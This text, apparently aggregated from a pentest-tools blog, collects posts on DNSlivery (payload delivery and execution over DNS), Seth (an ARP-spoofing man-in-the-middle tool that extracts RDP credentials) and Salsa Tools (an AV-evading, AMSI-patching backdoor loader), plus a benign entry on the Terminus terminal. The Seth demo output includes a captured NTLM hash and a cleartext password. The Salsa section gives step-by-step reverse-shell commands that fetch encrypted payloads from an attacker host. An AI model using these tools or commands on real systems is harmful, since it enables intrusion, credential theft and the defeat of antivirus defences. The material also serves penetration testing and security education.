PATH, –path PATH path of directory to serve over DNS (default: pwd) -s SIZE, –size SIZE size in bytes of base64 chunks (default: 255) -v, –verbose increase verbosityExample:$ sudo python3 dnslivery.py eth0 dnsd.no0.be vps.no0.be -p /tmp/dns-deliveryDNSlivery – Easy files and payloads delivery over DNS[*] File “file" ready for delivery at file.dnsd.no0.be (7 chunks)[*] Listening for DNS queries…Note on filename normalizationAs the charset allowed for domain names is much more restrictive than for UNIX filenames (per RFC1035), DNSlivery will perform normalization when required.Example:[*] File "My Awesome Powershell Script ;).ps1" ready for delivery at my-awesome-powershell-script—-ps1.dnsd.no0.be (1891 chunks)Be aware that the current normalization code is not perfect as it does not take overlapping filenames or size limit into account.TargetOn the target, start by retrieving the launcher of the desired file by requesting its dedicated TXT record. The following three launchers are supported: Action Launcher Description Print [filename].print.[domain] (Default) Print the delivered file to the console Execute [filename].exec.[domain] Execute the delivered file (useful for scripts) Save [filename].save.[domain] Save the delivered file to disk (useful for binaries) nslookup -type=txt [filename].[stager].[domain]Then, simply copy and paste the launcher quoted in the DNS response to a PowerShell console to retrieve the file on the target.Example:Download DNSlivery

Link: http://feedproxy.google.com/~r/PentestTools/~3/d-u-FwvPkdQ/dnslivery-easy-files-and-payloads.html

Seth – Perform A MitM Attack And Extract Clear Text Credentials From RDP Connections

Seth is a tool written in Python and Bash to MitM RDP connections by attempting to downgrade the connection in order to extract clear text credentials. It was developed to raise awareness and educate about the importance of properly configured RDP connections in the context of pentests, workshops or talks. The author is Adrian Vollmer (SySS GmbH).UsageRun it like this:$ ./seth.sh <ATTACKER IP> <VICTIM IP> <GATEWAY IP|HOST IP> [<COMMAND>]Unless the RDP host is on the same subnet as the victim machine, the last IP address must be that of the gateway.The last parameter is optional. It can contain a command that is executed on the RDP host by simulating WIN+R via key press event injection. Keystroke injection depends on which keyboard layout the victim is using – currently it’s only reliable with the English US layout. I suggest avoiding special characters by using powershell -enc <STRING>, where STRING is your UTF-16le and Base64 encoded command. However, calc should be pretty universal and gets the job done.The shell script performs ARP spoofing to gain a Man-in-the-Middle position and redirects the traffic such that it runs through an RDP proxy. The proxy can be called separately. This can be useful if you want use Seth in combination with Responder. Use Responder to gain a Man-in-the-Middle position and run Seth at the same time. Run seth.py -h for more information:usage: seth.py [-h] [-d] [-f] [-p LISTEN_PORT] [-b BIND_IP] [-g {0,1,3,11}] [-j INJECT] -c CERTFILE -k KEYFILE target_host [target_port]RDP credential sniffer — Adrian Vollmer, SySS GmbH 2017positional arguments: target_host target host of the RDP service target_port TCP port of the target RDP service (default 3389)optional arguments: -h, –help show this help message and exit -d, –debug show debug information -f, –fake-server perform a ‘fake server’ attack -p LISTEN_PORT, –listen-port LISTEN_PORT TCP port to listen on (default 3389) -b BIND_IP, –bind-ip BIND_IP IP address to bind the fake service to (default all) -g {0,1,3,11}, –downgrade {0,1,3,11} downgrade the authentication protocol to this (default 3) -j INJECT, –inject INJECT command to execute via key press event injection -c CERTFILE, –certfile CERTFILE path to the certificate file -k KEYFILE, –keyfile KEYFILE path to the key fileFor more information read the PDF in doc/paper (or read the code!). The paper also contains recommendations for counter measures.You can also watch a twenty minute presentation including a demo (starting at 14:00) on Youtube: https://www.youtube.com/watch?v=wdPkY7gykf4Or watch just the demo (with subtitles) here: https://www.youtube.com/watch?v=JvvxTNrKV-sDemoThe following ouput shows the attacker’s view. Seth sniffs an offline crackable hash as well as the clear text password. Here, NLA is not enforced and the victim ignored the certificate warning.# ./seth.sh eth1 192.168.57.{103,2,102}███████╗███████╗████████╗██╗ ██╗██╔════╝██╔════╝╚══██╔══╝██║ ██║ by Adrian Vollmer███████╗█████╗ ██║ ███████║ seth@vollmer.syss.de╚════██║██╔══╝ ██║ ██╔══██║ SySS GmbH, 2017███████║███████╗ ██║ ██║ ██║ https://www.syss.de╚══════╝╚══════╝ ╚═╝ ╚═╝ ╚═╝[*] Spoofing arp replies…[*] Turning on IP forwarding…[*] Set iptables rules for SYN packets…[*] Waiting for a SYN packet to the original destination…[+] Got it! Original destination is 192.168.57.102[*] Clone the x509 certificate of the original destination…[*] Adjust the iptables rule for all packets…[*] Run RDP proxy…Listening for new connectionConnection received from 192.168.57.103:50431Downgradin g authentication options from 11 to 3Enable SSLalice::avollmer-syss:1f20645749b0dfd5:b0d3d5f1642c05764ca28450f89d38db:0101000000000000b2720f48f5ded2012692fcdbf5c79a690000000002001e004400450053004b0054004f0050002d0056004e0056004d0035004f004e0001001e004400450053004b0054004f0050002d0056004e0056004d0035004f004e0004001e004400450053004b0054004f0050002d0056004e0056004d0035004f004e0003001e004400450053004b0054004f0050002d0056004e0056004d0035004f004e0007000800b2720f48f5ded20106000400020000000800300030000000000000000100000000200000413a2721a0d955c51a52d647289621706d6980bf83a5474c10d3ac02acb0105c0a0010000000000000000000000000000000000009002c005400450052004d005300520056002f003100390032002e003100360038002e00350037002e00310030003200000000000000000000000000Tamper with NTLM responseTLS alert access denied, Downgrading CredSSPConnection lostConnection received from 192.168.57.103:50409Listening for new connectionEnable SSLConnection lostConnection rece ived from 192.168.57.103:50410Listening for new connectionEnable SSLHiding forged protocol request from client.\alice:ilovebobKeyboard Layout: 0x409 (English_United_States)Key press: LShiftKey press: SKey release: SKey release: LShiftKey press: EKey release: EKey press: CKey release: CKey press: RKey release: RKey press: EKey release: EKey press: TKey release: TConnection lost[*] Cleaning up…[*] Done.Requirements python3 tcpdump arpspoof arpspoof is part of dsniff openssl DisclaimerUse at your own risk. Do not use without full consent of everyone involved. For educational purposes only.Download Seth

Link: http://feedproxy.google.com/~r/PentestTools/~3/otGqqcWw2mo/seth-perform-mitm-attack-and-extract.html

Terminus – A Terminal For A More Modern Age

Terminus is a highly configurable terminal emulator for Windows, macOS and LinuxTheming and color schemesFully configurable shortcutsSplit panesRemembers your tabsPowerShell (and PS Core), WSL, Git-Bash, Cygwin, Cmder and CMD supportIntegrated SSH client and connection managerFull Unicode support including double-width charactersDoesn’t choke on fast-flowing outputsProper shell experience on Windows including tab completion (via Clink) Terminus is an alternative to Windows’ standard terminal (conhost), PowerShell ISE, PuTTY or iTerm Terminus is not a new shell or a MinGW or Cygwin replacement. Neither is it lightweight – if RAM usage is of importance, consider Conemu or AlacrittyPluginsPlugins and themes can be installed directly from the Settings view inside Terminus.clickable-links – makes paths and URLs in the terminal clickableshell-selector – a quick shell selector panetitle-control – allows modifying the title of the terminal tabs by providing a prefix, suffix, and/or strings to be removedquick-cmds – quickly send commands to one or all terminal tabssave-output – record terminal output into a filescrollbar – adds a scrollbar to hterm tabsThemeshype – a Hyper inspired themerelaxed – the Relaxed theme for Terminusgruvboxwindows10altairDownload Terminus

Link: http://feedproxy.google.com/~r/PentestTools/~3/H3gcYftgMws/terminus-terminal-for-more-modern-age.html

Salsa Tools – ShellReverse TCP/UDP/ICMP/DNS/SSL/BINDTCP and AV bypass, AMSI patched

Salsa Tools is a collection of three different tools that combined, allows you to get a reverse shell on steroids in any Windows environment without even needing PowerShell for it’s execution. In order to avoid the latest detection techniques (AMSI), most of the components were initially written on C#. Salsa Tools was publicly released by Luis Vacas during his Talk “Inmersión en la explotación tiene rima” which took place during h-c0n in 9th February 2019.Features* TCP/UDP/ICMP/DNS/BIND/SSL * AV Safe (17th February)* AMSI patchers* PowerShell execution * …OverviewSalsa-Tools is made from three different ingredients: – EvilSalsa – EncrypterAssembly – SalseoLoader And his behavior is as it follows:SetupRequirementsVisual Studio 2017 (or similar)Python 2.7Running la SalsaCooking EvilSalsa ___ __ __ ____ _ / _] | || || | / [_| | | | | | | | _] | | | | | |___ | [_| : | | | | | | |\ / | | | | |_____| \_/ |____||_____| _____ ____ _ _____ ____ / ___/ / || | / ___/ / |( \_ | o || | ( \_ | o | \__ || || |___\__ || | / \ || _ || / \ || _ | \ || | || \ || | | \___||__|__||_____|\___||__|__| [+] That is our Payload EvilSalsa is the key ingredient of this recipe. It contains the payload, which is executed on the system as it follows: as soon as the payloads starts, it runs System.Management.Automation.dll which creates a runspace . Within that runspace we have four types of shells (TCP / UDP / ICMP / DNS / BINDTCP). Once EvilSalsa is loaded, first thing first, the existence of c:\windows\system32\amsi.dll is checked. If it exists, it is patched using a home-cooked variant of CyberArk and Rastamouse bypasses.Mixing EncrypterAssembly and Evilsalsa ______ _ | ____| | | | |__ _ __ ___ _ __ _ _ _ __ | |_ ___ _ __ | __| | ‘_ \ / __| ‘__| | | | ‘_ \| __/ _ \ ‘__| | |____| | | | (__| | | |_| | |_) | || __/ | |______|_| |_|\___|_| \__, | .__/ \__\___|_| /\ __/ | || | | | / \ ___ ___ ___ _|___/|_|| |__ | |_ _ / /\ \ / __/ __|/ _ \ ‘_ ` _ \| ‘_ \| | | | | / ____ \\__ \__ \ __/ | | | | | |_) | | |_| | /_/ \_\___/___/\___|_| |_| |_|_.__/|_|\__, | __/ | |___/ [+] Software that encrypts the payload using RC4 [+] We have the version in python and the version in .exeEncrypterAssembly can be used as a Python script or as a Exe binary. It encrypts the previously generated EvilSalsa.Python usage:python encrypterassembly.py <PASSWORD> <OUTPUT>Executable usage:Encrypterassembly.exe <FILE> <PASSWORD> <OUTPUT>Bringing the Encrypted EvilSalsa to the table with SalseoLoaderSalseoLoader is in charge of loading the encrypted payload. Can be both compiled as a library or as an executable. If it is run as an executable, the chosen arguments must be provided when the executable is run. If it is compiled as a library, the descriptor “main" must be exported. Arguments are added using environmental variables. _____ ____ _ _____ ___ ___ / ___/ / || | / ___/ / _] / \( \_ | o || | ( \_ / [_ | | \__ || || |___\__ || _]| O | / \ || _ || / \ || [_ | | \ || | || \ || || | \___||__|__||_____|\___||_____| \___/ _ ___ ____ ___ ___ ____| | / \ / || \ / _]| \| | | || o || \ / [_ | D )| |___ | O || || D || _]| /| || || _ || || [_ | \| || || | || || || . \|_____| \___/ |__|__||_____||_____||__|\_| By: CyberVaca@HackPlayers[+] Usage: [-] SalseoLoader.exe password http://webserver.com/elfuckingmal.txt ReverseTCP LHOST LPORT [-] SalseoLoader.exe password \\smbserver.com\evil\elfuckingmal.txt ReverseUDP LHOST LPORT [-] SalseoLoader.exe password c:\temp\elfuckingmal.txt R everseICMP LHOST [-] SalseoLoader.exe password http://webserver.com/elfuckingmal.txt ReverseDNS LHOST ServerDNS [-] SalseoLoader.exe password http://webserver.com/elfuckingmal.txt BindTCP LHOST LPORT [-] SalseoLoader.exe password c:\temp\elfuckingmal.txt ReverseSSL LHOST LPORT [-] SalseoLoader.exe password http://webserver.com/shellcode.txt shellcode[+] Shells availables: [-] ReverseTCP [-] ReverseDNS [-] ReverseSSL [-] Shellcode [-] ReverseUDP [-] ReverseICMP [-] BindTCPTutorialCompiling the binariesDownload the source code from the github and compile EvilSalsa and SalseoLoader. You will need Visual Studio installed to compile the code.Compile those projects for the architecture of the windows box where your are going to use them(If the Windows supports x64 compile them for that architectures).You can select the architecture inside Visual Studio in the left "Build" Tab in "Platform Target".(If you can’t find this options press in "Project Tab" and then in " Properties")Then, build both projects (Build -> Build Solution) (Inside the logs will appear the path of the executable):Prepare the BackdoorFirst of all, you will need to encode the EvilSalsa.dll. To do so, you can use the python script encrypterassembly.py or you can compile the project EncrypterAssemblyPythonpython EncrypterAssembly/encrypterassembly.py <FILE> <PASSWORD> <OUTPUT_FILE>python EncrypterAssembly/encrypterassembly.py EvilSalsa.dll password evilsalsa.dll.txtWindowsEncrypterAssembly.exe <FILE> <PASSWORD> <OUTPUT_FILE>EncrypterAssembly.exe EvilSalsa.dll password evilsalsa.dll.txtOk, now you have everything you need to execute all the Salseo thing: the encoded EvilDalsa.dll and the binary of SalseoLoader. Upload the SalseoLoader.exe binary to the machine. It shouldn’t be detected by any AV…Execute the backdoorGetting a TCP reverse shell (downloading encoded dll through HTTP)Remember to start a nc as the reverse shell listener, and a HTTP server to serve the encoded evilsalsa.SalseoLoader.exe password http://<Attacker-IP>/evilsalsa.dll.txt reversetcp <Attacker-IP> <Port>Getting a UDP reverse shell (downloading encoded dll through SMB)Remember to start a nc as the reverse shell listener, and a SMB server to serve the encoded evilsalsa (impacket-smbserver).SalseoLoader.exe password \\<Attacker-IP>/folder/evilsalsa.dll.txt reverseudp <Attacker-IP> <Port>Getting a TCP reverse shell SSL (using local file)Set the listener inside the attacker machine:openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodesopenssl s_server -key key.pem -cert cert.pem -port <port> -tls1Execute the backdoor:SalseoLoader.exe password C:/path/to/evilsalsa.dll.txt ReverseSSL <Attacker-IP> <Port>Getting a ICMP reverse shell (encoded dll already inside the victim)This time you need a special tool in the client to receive the reverse shell. Download: [https://github.com/inquisb/icmpsh]Disable ICMP Replies: #You finish, you can enable it again running: sysctl -w net.ipv4.icmp_echo_ignore_all=0 Execute the client:python icmpsh_m.py "<Attacker-IP>" "<Victm-IP>"Inside the victim, lets execute the salseo thing:SalseoLoader.exe password C:/Path/to/evilsalsa.dll.txt reverseicmp <Attacker-IP>Compiling SalseoLoader as DLL exporting main functionOpen the SalseoLoader project using Visual Studio.Add before the main function: [DllExport]Before the main function add this line: [DllExport]Install DllExport for this projectTools –> NuGet Package Manager –> Manage NuGet Packages for Solution…Search for DllExport package (using Browse tab), and press Install (and accept the popup)In your project folder have appeared the files: DllExport.bat and DllExport_Configure.batUninstall DllExportPress Uninstall (yeah, its weird but trust me, it is necessary)Exit Visual Studio and execute DllExport_configureJust exit Visual StudioThen, go to your SalseoLoader folder and execute DllExport_Configure.bat Select x64 (if you are going to use it inside a x64 box, that was my case), select System.Runtime.InteropServices (inside Namespace for DllExport) and press ApplyOpen the project again with visual Studio[DllExport] should not be longer marked as errorBuild the solutionSelect Output Type = Class Library (Project –> SalseoLoader Properties –> Application –> Output type = Class Library)Select x64 platform (Project –> SalseoLoader Properties –> Build –> Platform target = x64)To build the solution: Build –> Build Solution (Inside the Output console the path of the new DLL will appear)Test the generated DllCopy and paste the Dll where you want to test it.Execute:rundll32.exe SalseoLoader.dll,mainIf not error appears, probably you have a functional dll!!Get a shell using the DllDon’t forget to use a HTTP server and set a nc listenerPowershell#You finish, you can enable it again running:sysctl -w net.ipv4.icmp_echo_ignore_all=0CMD$env:pass="password"$env:payload="http://10.2.0.5/evilsalsax64.dll.txt"$env:lhost="10.2.0.5"$env:lport="1337"$env:shell="reversetcp"rundll32.exe SalseoLoader.dll,mainDocumented by https://github.com/carlospolop-forks/Download Salsa-tools

Link: http://feedproxy.google.com/~r/PentestTools/~3/Xgz-WkNK1wE/salsa-tools-shellreverse.html